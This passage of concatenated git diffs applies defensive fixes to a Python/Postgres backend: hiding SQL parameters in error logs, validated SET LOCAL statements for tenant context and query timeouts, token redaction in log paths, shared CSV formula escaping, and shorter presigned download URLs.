+        if isinstance(row, Mapping)
+        and isinstance(name := row.get("name"), str)
+        and isinstance(dtype := row.get("type"), str)
+        and dtype.lower() in NUMERIC_SQL_TYPES
+    )

--- a/backend/app/core/db/session.py
+++ b/backend/app/core/db/session.py
@@ -8,6 +8,17 @@ _engine_kwargs: dict = {
     "connect_args": settings.database_connect_args,
     "pool_pre_ping": settings.database_pool_pre_ping,
     "echo": False,
+    # fix(#1778): keep bound parameters out of StatementError.__str__. Without
+    # this SQLAlchemy renders "[SQL: ...] [parameters: (...)]" into the
+    # exception message, and the DB error handler in api/main.py logs that
+    # message WITH a traceback. The SEC-03 redactor in core/logging_config.py
+    # only rewrites top-level event_dict keys by name, so it cannot see values
+    # embedded in the `exception` string: a connection reset mid-INSERT on
+    # catalog.users would put password_hash, email and username in stdout, and
+    # any feature write would put arbitrary tenant row data there. The
+    # statement text still reaches the log, which is what the handler's
+    # docstring asks for.
+    "hide_parameters": True,
 }
 
 if settings.db_use_external_pooler:

--- a/backend/app/core/db/tenant_session.py
+++ b/backend/app/core/db/tenant_session.py
@@ -335,8 +335,37 @@ def _on_begin(conn: Connection) -> None:
     immediately before the first statement in a BEGIN/COMMIT block).
 
     In ``single_tenant`` (default): one boolean check, zero SQL → hard no-op.
-    In ``multi_tenant`` + var set: executes ``set_config`` with a bound param.
+    In ``multi_tenant`` + var set: issues ``SET LOCAL app.current_tenant``.
     In ``multi_tenant`` + var None: no-op (RLS fail-closes the unscoped query).
+
+    fix(#1778 codex r5): a ``SET LOCAL`` utility statement, not
+    ``SELECT set_config(..., true)``. Both set the same GUC for the same
+    transaction, but the SELECT form is a query, so it takes the transaction's
+    first snapshot and Postgres then refuses ``SET TRANSACTION ISOLATION
+    LEVEL`` and ``SET TRANSACTION [NOT] DEFERRABLE`` with "must be called
+    before any query" (25001). ``processing/ingest/tasks_postgis_refresh.py``
+    records having been bitten by precisely this hook: the in-transaction
+    spelling of REPEATABLE READ worked in single_tenant, where this function is
+    a hard no-op, and would have failed every registered-table refresh on a
+    multi-tenant deployment. That workaround stays where it is; this removes
+    the cause.
+
+    MEASURED, because the shape of the exposure is easy to get wrong:
+    ``SET TRANSACTION READ ONLY`` is unaffected by either form. Postgres
+    applies the first-query restriction to ``transaction_read_only`` only when
+    going read-only → read-write, so the sandbox executor's write backstop
+    (``platform/sandbox/executor.py``) held under the SELECT form too.
+    ISOLATION LEVEL and DEFERRABLE are the two that break.
+
+    T-1208-01 required a bound parameter here so a tenant id could never be
+    f-stringed into SQL. ``SET`` takes no bind parameter, so the guard moves to
+    the value instead: ``_normalize_context_tenant_id`` rejects anything that
+    is not a UUID and returns Python's own canonical rendering of it, which is
+    36 characters of hex and hyphens and cannot carry a quote. That is the same
+    guard ``tenant_data_schema`` and ``tenant_reader_role`` already rely on to
+    interpolate this value into an identifier (T-1209-14). It runs here as well
+    as at the two ``current_tenant_var.set`` sites, so the check sits at the
+    sink rather than only at the source.
 
     Parameters
     ----------
@@ -354,11 +383,16 @@ def _on_begin(conn: Connection) -> None:
         # Var unset in multi_tenant — leave GUC unset so RLS fail-closes.
         return
 
-    # T-1208-01: bound param — never f-string the tenant id into SQL.
-    stmt = text("SELECT set_config('app.current_tenant', :tid, true)").bindparams(
-        tid=tid
-    )
-    conn.execute(stmt)
+    try:
+        canonical = _normalize_context_tenant_id(tid, operation="_on_begin")
+    except ValueError:
+        # Fail closed rather than interpolating something unvalidated: leaving
+        # the GUC unset is the same state as the `tid is None` branch above,
+        # and RLS refuses the unscoped query. Logged without the value.
+        logger.warning("tenant_guc_skipped_invalid_tenant_id")
+        return
+
+    conn.execute(text(f"SET LOCAL app.current_tenant = '{canonical}'"))
 
 
 def install_tenant_session_hook(engine: object) -> None:

--- a/backend/app/core/dependencies.py
+++ b/backend/app/core/dependencies.py
@@ -11,7 +11,13 @@ async def get_db() -> AsyncGenerator[AsyncSession, None]:
     # wrong database. test_layering.py enforces this for the whole tree.
     from app.core.db import async_session
 
+    # fix(#1778): a query deadline on the sessions HTTP requests run on. See
+    # app/core/statement_timeout.py for why it is scoped here rather than set
+    # on the engine both the API and the worker share.
+    from app.core.statement_timeout import bind_request_statement_timeout
+
     async with async_session() as session:
+        bind_request_statement_timeout(session)
         try:
             yield session
         except Exception:  # broad: session boundary — any handler exception triggers rollback then re-raise

--- a/backend/app/core/dependencies.py
+++ b/backend/app/core/dependencies.py
@@ -11,13 +11,7 @@ async def get_db() -> AsyncGenerator[AsyncSession, None]:
     # wrong database. test_layering.py enforces this for the whole tree.
     from app.core.db import async_session
 
-    # fix(#1778): a query deadline on the sessions HTTP requests run on. See
-    # app/core/statement_timeout.py for why it is scoped here rather than set
-    # on the engine both the API and the worker share.
-    from app.core.statement_timeout import bind_request_statement_timeout
-
     async with async_session() as session:
-        bind_request_statement_timeout(session)
         try:
             yield session
         except Exception:  # broad: session boundary — any handler exception triggers rollback then re-raise

--- a/backend/app/core/logging_config.py
+++ b/backend/app/core/logging_config.py
@@ -112,6 +112,26 @@ _SENSITIVE_FIELDS: frozenset[str] = frozenset(
 # most; this only exists so a caller-supplied cyclic structure terminates.
 _MAX_REDACT_DEPTH = 8
 
+# fix(#1778): share-link and embed paths carry a bearer capability as a PATH
+# segment, so no keyed-field redactor can reach it -- `_redact_sensitive_fields`
+# is key-based and the value is inside a string. The access-log middleware has
+# scrubbed these since #821; the two 5xx handlers (api/main.py's operational-DB
+# 503 and standards/ogc/errors.py's unhandled-error 500) logged
+# `request.url.path` raw, so any server error on a shared-map request wrote the
+# full token into the application log where it stays replayable. The helper
+# lives here rather than in api/middleware/ so `standards/` can import it
+# without reaching up into the API layer.
+#
+# `/m/` joins the two `maps/shared/` shapes because frontend/nginx.conf already
+# redacts all three at the edge; the Python side had only the API ones.
+_CAPABILITY_PATH_RE = re.compile(r"^(?P<prefix>/(?:api/)?maps/shared/|/m/)[^/]+")
+
+
+def safe_access_log_path(path: str) -> str:
+    """Remove bearer capability segments from paths written to logs."""
+    return _CAPABILITY_PATH_RE.sub(r"\g<prefix>[REDACTED]", path, count=1)
+
+
 # fix(#1746): catches a token value rendered either as a Python dict repr
 # (`{'token': 'abc', ...}`) or as `key=value!r` keyword arguments — the shape
 # `Job.call_string` actually produces, e.g.

--- a/backend/app/core/statement_timeout.py
+++ b/backend/app/core/statement_timeout.py
@@ -41,12 +41,41 @@ The two processes have separate engine INSTANCES, so a per-process
 registration separates them exactly. ``app/api/main.py`` installs this; the
 worker entrypoint never imports that module, so its engine is untouched.
 
-``do_connect`` rather than executing SQL on ``connect``: asyncpg's
-``server_settings`` is sent in the startup packet, so the deadline is in force
-before the first statement and costs no extra round trip. It is the same knob
-``processing/tiles/pool.py`` passes to its own pool. A ``SET LOCAL`` inside a
-transaction still overrides it, which is how the handful of API routes that
-need longer keep working.
+One shape, both topologies
+--------------------------
+fix(#1778 codex r3): the deadline is issued as ``SET LOCAL`` at the start of
+every transaction, and NOT as asyncpg ``server_settings``.
+
+``server_settings`` travels in the startup packet, and standard PgBouncer
+rejects a startup parameter it does not track. ``DB_USE_EXTERNAL_POOLER=true``
+is a documented, supported topology (``.env.example``, and
+``database_connect_args`` already turns off the prepared-statement cache for
+it), so a startup-packet deadline would have failed every connection and taken
+API boot with it. Telling operators to add ``statement_timeout`` to PgBouncer's
+``ignore_startup_parameters`` is worse than useless: the parameter is then
+dropped in silence and the deadline is simply gone.
+
+A connection-scoped ``SET`` is not the answer either. Under transaction-mode
+pooling a server connection is handed to a different client between
+transactions, so a session-level ``SET`` would either be reset away or leak
+onto someone else's transaction.
+
+``SET LOCAL`` at transaction start is correct under both topologies, which is
+why it is used under both rather than branching on the flag -- a branch is two
+behaviours that drift, and only one of them gets exercised in CI. It costs one
+extra round trip per transaction, on a local socket, which is the price of the
+deadline applying at all when a pooler is in front.
+
+A later ``SET LOCAL`` in the same transaction still wins, which is how the
+handful of API routes that need longer keep working.
+
+It rides the engine's ``begin`` event rather than the ORM ``Session``'s
+``after_begin``, for two reasons: the listener is then scoped to ONE engine
+instance instead of to every Session in the process, and it fires for a raw
+``engine.connect()`` transaction as well as an ORM one.
+``install_tenant_session_hook`` uses the same event for the same reasons, and
+``set_config(..., is_local => true)`` is ``SET LOCAL`` with a bound parameter
+rather than an interpolated one.
 
 Not set here: ``idle_in_transaction_session_timeout``. ``processing/ingest``'s
 job route opens a transaction and then waits out a 300-second ``ogrinfo``
@@ -58,7 +87,7 @@ holding a transaction across a subprocess first.
 from __future__ import annotations
 
 import structlog
-from sqlalchemy import event
+from sqlalchemy import event, text
 
 logger = structlog.get_logger(__name__)
 
@@ -73,7 +102,7 @@ def statement_timeout_ms() -> int:
 
 
 def install_api_statement_timeout(engine) -> None:
-    """Give every connection *engine* opens the API's statement deadline.
+    """Give every transaction *engine* opens the API's statement deadline.
 
     Idempotent via a sentinel on the sync engine, mirroring
     ``install_tenant_session_hook``, so repeated calls (a test re-registering,
@@ -87,20 +116,23 @@ def install_api_statement_timeout(engine) -> None:
         return
 
     sync_engine = engine.sync_engine
-    if getattr(sync_engine, _INSTALLED_ATTR, False):
+    # `is True`, not truthiness: the sentinel is one this function sets, and an
+    # object that answers every attribute would otherwise report itself already
+    # installed and silently leave the engine unbounded.
+    if getattr(sync_engine, _INSTALLED_ATTR, False) is True:
         return
 
-    @event.listens_for(sync_engine, "do_connect")
-    def _apply_statement_timeout(_dialect, _conn_rec, _cargs, cparams):
-        # Merge rather than assign: the SSL branch and the external-pooler
-        # branch of database_connect_args may already have put keys here, and
-        # a future one must not be dropped by this hook.
-        server_settings = dict(cparams.get("server_settings") or {})
-        server_settings.setdefault("statement_timeout", str(timeout_ms))
-        cparams["server_settings"] = server_settings
-        # None means "carry on and connect normally" -- this hook only edits
-        # the parameters it was handed.
-        return None
+    # `set_config(..., is_local => true)` IS `SET LOCAL`, and unlike the `SET
+    # LOCAL` statement it accepts a bound parameter, so the value is never
+    # interpolated into SQL. The tenant GUC hook issues the tenant id the same
+    # way. Postgres reads a bare number for statement_timeout as milliseconds.
+    statement = text("SELECT set_config('statement_timeout', :ms, true)").bindparams(
+        ms=str(timeout_ms)
+    )
+
+    @event.listens_for(sync_engine, "begin")
+    def _apply_statement_timeout(conn) -> None:
+        conn.execute(statement)
 
     setattr(sync_engine, _INSTALLED_ATTR, True)
     logger.debug("api_statement_timeout_installed", timeout_ms=timeout_ms)

--- a/backend/app/core/statement_timeout.py
+++ b/backend/app/core/statement_timeout.py
@@ -1,10 +1,10 @@
-"""A query deadline for the DB sessions API requests run on.
+"""A query deadline for every session the API process opens.
 
-fix(#1778): nothing bounded statement execution on the engine every request
-uses. ``database_connect_args`` carries only the SSL branch and, behind an
-external pooler, ``statement_cache_size``; ``core/db/session.py`` adds
-``pool_size``, ``max_overflow``, ``pool_timeout`` and ``pool_recycle``, and
-``pool_timeout`` bounds CHECKOUT, never execution. The cluster sets none of
+fix(#1778): nothing bounded statement execution on the engine the API uses.
+``database_connect_args`` carries only the SSL branch and, behind an external
+pooler, ``statement_cache_size``; ``core/db/session.py`` adds ``pool_size``,
+``max_overflow``, ``pool_timeout`` and ``pool_recycle``, and ``pool_timeout``
+bounds CHECKOUT, never execution. The cluster sets none of
 ``statement_timeout``, ``idle_in_transaction_session_timeout`` or
 ``lock_timeout`` (``db/postgresql.conf`` sets one thing, ``max_connections``).
 The mechanism was never unavailable: ``processing/tiles/pool.py`` passes
@@ -17,65 +17,90 @@ pool slots indefinitely, and uvicorn does not cancel a handler when its client
 disconnects, so the query outlives the request that asked for it with no
 ceiling at all.
 
-Why here and not on the engine
-------------------------------
-The obvious fix is ``server_settings={"statement_timeout": ...}`` in
-``database_connect_args``. It cannot be: that property builds the connect args
-for the ONE engine both the API and the Procrastinate worker import, and the
-worker legitimately runs single statements for minutes -- building a spatial
-index over a freshly ingested table, deriving ``geom_4326``, computing an
-extent. A session default would kill those. The long-running paths that DO know
-they are long already carry their own ``SET LOCAL`` override
-(``analysis/tasks.py``, ``tenant_adoption_sql.py``), but the ingest ones do not,
-and inferring which is which from inside a connect-args property is not
-something a config module can do.
+Why the engine and not the dependency
+------------------------------------
+fix(#1778 codex r2): the first version bound the deadline to the session
+``get_db`` yields. That is not the whole API surface. Handlers open
+request-scoped sessions directly through ``async_session()`` in more than
+twenty modules -- ``GET /stac/collections`` runs three aggregates that way --
+and every one of those pinned a pool slot with no deadline. Binding at the
+engine covers all of them, including any added later, and costs nothing per
+request.
 
-Scoping the deadline to ``get_db`` puts it exactly on the surface the finding
-is about -- every ordinary DB-touching HTTP request -- and nowhere near the
-worker, which never uses that dependency.
+Why an event and not ``database_connect_args``
+----------------------------------------------
+That property builds the connect args for the ONE engine module both the API
+and the Procrastinate worker import, and the worker legitimately runs single
+statements for minutes -- building a spatial index over a freshly ingested
+table, deriving ``geom_4326``, computing an extent. A session default there
+would kill those. The long-running paths that know they are long already carry
+their own ``SET LOCAL`` override (``analysis/tasks.py``,
+``tenant_adoption_sql.py``), but the ingest ones do not.
 
-Why a per-session listener and not one statement
-------------------------------------------------
-``SET LOCAL`` lasts for the transaction. A handler that writes, commits, and
-then reads again would run the rest of the request unbounded. Listening for
-``after_begin`` on this request's session re-applies it to every transaction the
-request opens, at the cost of one extra round trip per transaction on a local
-socket.
+The two processes have separate engine INSTANCES, so a per-process
+registration separates them exactly. ``app/api/main.py`` installs this; the
+worker entrypoint never imports that module, so its engine is untouched.
+
+``do_connect`` rather than executing SQL on ``connect``: asyncpg's
+``server_settings`` is sent in the startup packet, so the deadline is in force
+before the first statement and costs no extra round trip. It is the same knob
+``processing/tiles/pool.py`` passes to its own pool. A ``SET LOCAL`` inside a
+transaction still overrides it, which is how the handful of API routes that
+need longer keep working.
 
 Not set here: ``idle_in_transaction_session_timeout``. ``processing/ingest``'s
 job route opens a transaction and then waits out a 300-second ``ogrinfo``
 subprocess before its next statement, so any value that would bound an
 abandoned transaction also kills a working one. That needs the route to stop
-holding a transaction across a subprocess first, which is a different change.
+holding a transaction across a subprocess first.
 """
 
 from __future__ import annotations
 
+import structlog
 from sqlalchemy import event
+
+logger = structlog.get_logger(__name__)
+
+_INSTALLED_ATTR = "_geolens_api_statement_timeout_installed"
 
 
 def statement_timeout_ms() -> int:
-    """The per-request deadline in milliseconds; 0 means no deadline."""
+    """The API-side deadline in milliseconds; 0 means no deadline."""
     from app.core.config import settings
 
     return max(0, int(settings.db_statement_timeout_seconds)) * 1000
 
 
-def bind_request_statement_timeout(session) -> None:
-    """Apply the request deadline to every transaction *session* opens.
+def install_api_statement_timeout(engine) -> None:
+    """Give every connection *engine* opens the API's statement deadline.
 
-    ``session`` is an ``AsyncSession``. The listener is registered on that one
-    instance, so it is discarded with the session at the end of the request.
+    Idempotent via a sentinel on the sync engine, mirroring
+    ``install_tenant_session_hook``, so repeated calls (a test re-registering,
+    a module imported twice) do not stack listeners.
+
+    Call this only from the API process. Called with the deadline disabled
+    (``DB_STATEMENT_TIMEOUT_SECONDS=0``) it registers nothing.
     """
     timeout_ms = statement_timeout_ms()
     if timeout_ms <= 0:
         return
 
-    # Interpolated rather than bound: it is a validated non-negative int from
-    # settings, and SET LOCAL does not accept a parameter placeholder for its
-    # value.
-    statement = f"SET LOCAL statement_timeout = {timeout_ms}"
+    sync_engine = engine.sync_engine
+    if getattr(sync_engine, _INSTALLED_ATTR, False):
+        return
 
-    @event.listens_for(session.sync_session, "after_begin")
-    def _apply(_session, _transaction, connection) -> None:
-        connection.exec_driver_sql(statement)
+    @event.listens_for(sync_engine, "do_connect")
+    def _apply_statement_timeout(_dialect, _conn_rec, _cargs, cparams):
+        # Merge rather than assign: the SSL branch and the external-pooler
+        # branch of database_connect_args may already have put keys here, and
+        # a future one must not be dropped by this hook.
+        server_settings = dict(cparams.get("server_settings") or {})
+        server_settings.setdefault("statement_timeout", str(timeout_ms))
+        cparams["server_settings"] = server_settings
+        # None means "carry on and connect normally" -- this hook only edits
+        # the parameters it was handed.
+        return None
+
+    setattr(sync_engine, _INSTALLED_ATTR, True)
+    logger.debug("api_statement_timeout_installed", timeout_ms=timeout_ms)

--- a/backend/app/core/statement_timeout.py
+++ b/backend/app/core/statement_timeout.py
@@ -66,6 +66,11 @@ behaviours that drift, and only one of them gets exercised in CI. It costs one
 extra round trip per transaction, on a local socket, which is the price of the
 deadline applying at all when a pooler is in front.
 
+fix(#1778 codex r5): the statement is `SET LOCAL statement_timeout = <ms>` and
+not `SELECT set_config('statement_timeout', :ms, true)`. See the comment at the
+listener for why -- the SELECT form takes the transaction's first snapshot and
+locks out `SET TRANSACTION ISOLATION LEVEL` / `DEFERRABLE`.
+
 A later ``SET LOCAL`` in the same transaction still wins, which is how the
 handful of API routes that need longer keep working.
 
@@ -73,9 +78,7 @@ It rides the engine's ``begin`` event rather than the ORM ``Session``'s
 ``after_begin``, for two reasons: the listener is then scoped to ONE engine
 instance instead of to every Session in the process, and it fires for a raw
 ``engine.connect()`` transaction as well as an ORM one.
-``install_tenant_session_hook`` uses the same event for the same reasons, and
-``set_config(..., is_local => true)`` is ``SET LOCAL`` with a bound parameter
-rather than an interpolated one.
+``install_tenant_session_hook`` uses the same event for the same reasons.
 
 Not set here: ``idle_in_transaction_session_timeout``. ``processing/ingest``'s
 job route opens a transaction and then waits out a 300-second ``ogrinfo``
@@ -122,13 +125,34 @@ def install_api_statement_timeout(engine) -> None:
     if getattr(sync_engine, _INSTALLED_ATTR, False) is True:
         return
 
-    # `set_config(..., is_local => true)` IS `SET LOCAL`, and unlike the `SET
-    # LOCAL` statement it accepts a bound parameter, so the value is never
-    # interpolated into SQL. The tenant GUC hook issues the tenant id the same
-    # way. Postgres reads a bare number for statement_timeout as milliseconds.
-    statement = text("SELECT set_config('statement_timeout', :ms, true)").bindparams(
-        ms=str(timeout_ms)
-    )
+    # fix(#1778 codex r5): a plain `SET LOCAL` utility statement, NOT
+    # `SELECT set_config(..., true)`. The two set the same GUC, but the SELECT
+    # form is a query: it takes the transaction's first snapshot, and Postgres
+    # refuses `SET TRANSACTION ISOLATION LEVEL` and `SET TRANSACTION
+    # [NOT] DEFERRABLE` after that with "must be called before any query"
+    # (25001). This engine already had one begin-time SELECT -- the tenant GUC
+    # hook -- and `processing/ingest/tasks_postgis_refresh.py` documents having
+    # been bitten by exactly that: the in-transaction spelling of REPEATABLE
+    # READ worked in single_tenant, where the tenant hook is a no-op, and would
+    # have failed every registered-table refresh on a multi-tenant deployment.
+    # A second begin-time SELECT here would have extended that hazard to every
+    # deployment. `SET LOCAL` takes no snapshot, so nothing downstream is
+    # constrained by the order.
+    #
+    # MEASURED, because the shape of the exposure is easy to get wrong:
+    # `SET TRANSACTION READ ONLY` is NOT affected either way -- Postgres only
+    # applies the first-query restriction to read_only when going read-only ->
+    # read-write -- so the sandbox executor's write backstop held under both
+    # forms. ISOLATION LEVEL and DEFERRABLE are the two that break.
+    #
+    # SET does not take a bind parameter, so the value is interpolated; the
+    # int() round-trip below IS the injection guard. `timeout_ms` is derived
+    # from a ge=0 integer Settings field and cannot be anything else, and this
+    # restates that at the point where it reaches SQL.
+    literal_ms = int(timeout_ms)
+    if literal_ms < 0:
+        raise ValueError(f"statement timeout must be non-negative, got {literal_ms}")
+    statement = text(f"SET LOCAL statement_timeout = {literal_ms}")
 
     @event.listens_for(sync_engine, "begin")
     def _apply_statement_timeout(conn) -> None:

--- a/backend/app/core/statement_timeout.py
+++ b/backend/app/core/statement_timeout.py
@@ -1,0 +1,81 @@
+"""A query deadline for the DB sessions API requests run on.
+
+fix(#1778): nothing bounded statement execution on the engine every request
+uses. ``database_connect_args`` carries only the SSL branch and, behind an
+external pooler, ``statement_cache_size``; ``core/db/session.py`` adds
+``pool_size``, ``max_overflow``, ``pool_timeout`` and ``pool_recycle``, and
+``pool_timeout`` bounds CHECKOUT, never execution. The cluster sets none of
+``statement_timeout``, ``idle_in_transaction_session_timeout`` or
+``lock_timeout`` (``db/postgresql.conf`` sets one thing, ``max_connections``).
+The mechanism was never unavailable: ``processing/tiles/pool.py`` passes
+``command_timeout`` to its own asyncpg pool, and four sites set ``lock_timeout``
+deliberately, so the team knows it exists.
+
+The consequence is that one pathological plan -- a seq-scanned dataset lookup,
+an unindexed keyword filter, a heavy STAC aggregate -- pins one of a handful of
+pool slots indefinitely, and uvicorn does not cancel a handler when its client
+disconnects, so the query outlives the request that asked for it with no
+ceiling at all.
+
+Why here and not on the engine
+------------------------------
+The obvious fix is ``server_settings={"statement_timeout": ...}`` in
+``database_connect_args``. It cannot be: that property builds the connect args
+for the ONE engine both the API and the Procrastinate worker import, and the
+worker legitimately runs single statements for minutes -- building a spatial
+index over a freshly ingested table, deriving ``geom_4326``, computing an
+extent. A session default would kill those. The long-running paths that DO know
+they are long already carry their own ``SET LOCAL`` override
+(``analysis/tasks.py``, ``tenant_adoption_sql.py``), but the ingest ones do not,
+and inferring which is which from inside a connect-args property is not
+something a config module can do.
+
+Scoping the deadline to ``get_db`` puts it exactly on the surface the finding
+is about -- every ordinary DB-touching HTTP request -- and nowhere near the
+worker, which never uses that dependency.
+
+Why a per-session listener and not one statement
+------------------------------------------------
+``SET LOCAL`` lasts for the transaction. A handler that writes, commits, and
+then reads again would run the rest of the request unbounded. Listening for
+``after_begin`` on this request's session re-applies it to every transaction the
+request opens, at the cost of one extra round trip per transaction on a local
+socket.
+
+Not set here: ``idle_in_transaction_session_timeout``. ``processing/ingest``'s
+job route opens a transaction and then waits out a 300-second ``ogrinfo``
+subprocess before its next statement, so any value that would bound an
+abandoned transaction also kills a working one. That needs the route to stop
+holding a transaction across a subprocess first, which is a different change.
+"""
+
+from __future__ import annotations
+
+from sqlalchemy import event
+
+
+def statement_timeout_ms() -> int:
+    """The per-request deadline in milliseconds; 0 means no deadline."""
+    from app.core.config import settings
+
+    return max(0, int(settings.db_statement_timeout_seconds)) * 1000
+
+
+def bind_request_statement_timeout(session) -> None:
+    """Apply the request deadline to every transaction *session* opens.
+
+    ``session`` is an ``AsyncSession``. The listener is registered on that one
+    instance, so it is discarded with the session at the end of the request.
+    """
+    timeout_ms = statement_timeout_ms()
+    if timeout_ms <= 0:
+        return
+
+    # Interpolated rather than bound: it is a validated non-negative int from
+    # settings, and SET LOCAL does not accept a parameter placeholder for its
+    # value.
+    statement = f"SET LOCAL statement_timeout = {timeout_ms}"
+
+    @event.listens_for(session.sync_session, "after_begin")
+    def _apply(_session, _transaction, connection) -> None:
+        connection.exec_driver_sql(statement)

--- a/backend/app/modules/admin/router.py
+++ b/backend/app/modules/admin/router.py
@@ -49,6 +49,7 @@ from app.modules.auth.schemas import UserResponse
 from app.processing.export.service import safe_content_disposition
 from app.core.config import settings as app_settings
 from app.core.db.tenant_session import defer_async_with_tenant, tenant_job_context
+from app.core.csv_safety import escape_csv_formula
 from app.core.dependencies import get_client_ip, get_db
 from app.modules.admin.router_operations import router as operations_router
 from app.platform.extensions import get_catalog_port
@@ -290,12 +291,6 @@ async def export_users_csv(
     Cells starting with =, +, -, or @ are tab-prefixed (CSV injection hardening).
     """
 
-    def _safe(val: str) -> str:
-        """Prefix formula-injection trigger characters with a tab."""
-        if val and val[0] in ("=", "+", "-", "@"):
-            return "\t" + val
-        return val
-
     operation_id = uuid.uuid4()
     actor_id = current_user.id
     ip_address = get_client_ip(request)
@@ -375,10 +370,10 @@ async def export_users_csv(
                     async for (user,) in result:
                         writer.writerow(
                             [
-                                _safe(user.email or ""),
-                                _safe(user.username or ""),
-                                _safe(user.auth_provider or ""),
-                                _safe(user.status or ""),
+                                escape_csv_formula(user.email or ""),
+                                escape_csv_formula(user.username or ""),
+                                escape_csv_formula(user.auth_provider or ""),
+                                escape_csv_formula(user.status or ""),
                                 user.created_at.isoformat() if user.created_at else "",
                             ]
                         )

--- a/backend/app/modules/audit/router.py
+++ b/backend/app/modules/audit/router.py
@@ -52,6 +52,7 @@ from app.modules.audit.service import (
 )
 from app.core.identity import Identity
 from app.modules.auth.dependencies import get_current_active_user, require_permission
+from app.core.csv_safety import escape_csv_formula
 from app.core.dependencies import get_client_ip, get_db
 from app.processing.export.service import safe_content_disposition
 from app.standards.ogc.errors import ERROR_RESPONSES_AUTH
@@ -80,11 +81,11 @@ _EXPORT_OUTCOME_TIMEOUT_SECONDS = 5
 _EXPORT_NAME_CHUNK_ROWS = 500
 
 
-def _safe_csv_cell(value: str) -> str:
-    """Prevent spreadsheet formula execution for user-controlled CSV cells."""
-    if value and value[0] in ("=", "+", "-", "@"):
-        return "\t" + value
-    return value
+# fix(#1778): one rule, in core/csv_safety.py, shared with the admin user export
+# and the dataset CSV export. The third writer had no hardening at all, which is
+# what a private copy per writer costs. Re-exported under the name this module's
+# callers and tests already use.
+_safe_csv_cell = escape_csv_formula
 
 
 @dataclass(frozen=True)

--- a/backend/app/modules/catalog/datasets/api/router_export.py
+++ b/backend/app/modules/catalog/datasets/api/router_export.py
@@ -844,6 +844,14 @@ async def _resolve_download_user(
                     detail="Invalid or expired download token",
                 )
 
+        # fix(#1778): remember the credential's own deadline. The last hop of
+        # this route hands the caller a presigned bucket URL, and that URL has
+        # to expire with the capability that authorized it rather than on a
+        # flat hour of its own. Stashed rather than returned because the
+        # dependency's contract is Identity | None and a no-sub token resolves
+        # to None -- the anonymous public-dataset case still has a deadline.
+        request.state.download_token_exp = payload.get("exp")
+
         # Per SEC-04: enforce typ='download' on the query-param lane.
         if payload.get("typ") != "download":
             raise HTTPException(
@@ -1188,6 +1196,47 @@ def _managed_key(raster_asset) -> str:
     )
 
 
+# fix(#1778): the presigned redirect used a flat 3600 seconds. That exchanged a
+# 120-second, dataset-scoped, revocable capability (IA-P0-01 / SEC-04, minted by
+# POST /auth/download-token/{id}) for an hour-long bearer URL that authenticates
+# nobody: the SigV4 signature is in the query string and is bound to neither the
+# caller, the session, nor the dataset grant. Revoking the grant, flipping the
+# record to private, disabling the account or discarding the token does not
+# invalidate it, because the bucket has never heard of any of those. The access
+# gate above this is the full RBAC path, so the branch is reached for PRIVATE
+# and INTERNAL datasets too, and the URL lands in browser history and in every
+# proxy or CDN access log on the way.
+#
+# The ceiling is on the same order as the mint TTL rather than 30x it. The floor
+# exists because the deadline is evaluated when the bucket receives the request,
+# not over the transfer: a redirect a browser follows in milliseconds still has
+# to survive clock skew between this process and the object store, and a
+# multi-GB download that starts inside the window completes outside it.
+_COG_PRESIGN_CEILING_SECONDS = 300
+_COG_PRESIGN_FLOOR_SECONDS = 60
+
+
+def _cog_presign_seconds(request: Request) -> int:
+    """How long the redirected bucket URL may stay valid.
+
+    Derived from the remaining lifetime of the caller's download token when
+    there is one, the way `sign_url_with_deadline` expires an ingest presign
+    with its job rather than an hour from now. A caller who reached this route
+    on a session JWT, an API key, or anonymously against a public dataset has
+    no such deadline and gets the ceiling.
+    """
+    import time
+
+    deadline = getattr(request.state, "download_token_exp", None)
+    if deadline is None:
+        return _COG_PRESIGN_CEILING_SECONDS
+    try:
+        remaining = int(float(deadline) - time.time())
+    except (TypeError, ValueError):
+        return _COG_PRESIGN_CEILING_SECONDS
+    return max(_COG_PRESIGN_FLOOR_SECONDS, min(_COG_PRESIGN_CEILING_SECONDS, remaining))
+
+
 async def _s3_cog_response(
     request: Request,
     storage,
@@ -1266,7 +1315,9 @@ async def _s3_cog_response(
             },
         )
 
-    url = storage.generate_presigned_get_url(physical_asset_key, expiration=3600)
+    url = storage.generate_presigned_get_url(
+        physical_asset_key, expiration=_cog_presign_seconds(request)
+    )
     return RedirectResponse(url=url, status_code=302)
 
 

--- a/backend/app/modules/catalog/datasets/api/router_export.py
+++ b/backend/app/modules/catalog/datasets/api/router_export.py
@@ -1207,23 +1207,43 @@ def _managed_key(raster_asset) -> str:
 # and INTERNAL datasets too, and the URL lands in browser history and in every
 # proxy or CDN access log on the way.
 #
-# The ceiling is on the same order as the mint TTL rather than 30x it. The floor
-# exists because the deadline is evaluated when the bucket receives the request,
-# not over the transfer: a redirect a browser follows in milliseconds still has
-# to survive clock skew between this process and the object store, and a
-# multi-GB download that starts inside the window completes outside it.
+# The ceiling is on the same order as the mint TTL rather than 30x it.
+#
+# fix(#1778 codex r8): and there is NO floor. The first version floored the
+# window at 60 seconds to absorb clock skew, which meant a token with one
+# second left still bought a minute of access to a private COG -- the same
+# defect this block was written to remove, one order of magnitude smaller.
+#
+# `require_signable_job_lifetime` in processing/ingest/presigned.py already
+# settled this for the upload doors, and says why: "`ExpiresIn` is relative to
+# SIGNING time, so flooring at 1 mints a URL that is USABLE for one more
+# second -- past the deadline this whole change exists to enforce. There is no
+# `ExpiresIn` value that means 'already dead': the only way to avoid handing
+# out a live URL is to not sign one." A 60-second floor is that argument
+# ignored 60 times over. The download door now refuses on the same principle.
+#
+# The minimum is SigV4's own: `X-Amz-Expires` accepts 1..604800, so one second
+# is the shortest signature that exists. Below that there is nothing to mint
+# and the answer is 401 -- the authorizing credential expired between the
+# dependency that verified it and this redirect.
 _COG_PRESIGN_CEILING_SECONDS = 300
-_COG_PRESIGN_FLOOR_SECONDS = 60
+# The SigV4 lower bound on X-Amz-Expires. Not a policy knob: there is no
+# shorter signature to hand out.
+_COG_PRESIGN_MINIMUM_SECONDS = 1
 
 
 def _cog_presign_seconds(request: Request) -> int:
     """How long the redirected bucket URL may stay valid.
 
-    Derived from the remaining lifetime of the caller's download token when
-    there is one, the way `sign_url_with_deadline` expires an ingest presign
-    with its job rather than an hour from now. A caller who reached this route
-    on a session JWT, an API key, or anonymously against a public dataset has
-    no such deadline and gets the ceiling.
+    Capped at the remaining lifetime of the caller's download token when there
+    is one, the way `sign_url_with_deadline` expires an ingest presign with its
+    job rather than an hour from now. A caller who reached this route on a
+    session JWT, an API key, or anonymously against a public dataset has no
+    such deadline and gets the ceiling.
+
+    Raises 401 when the token has less than one second left. fix(#1778 codex
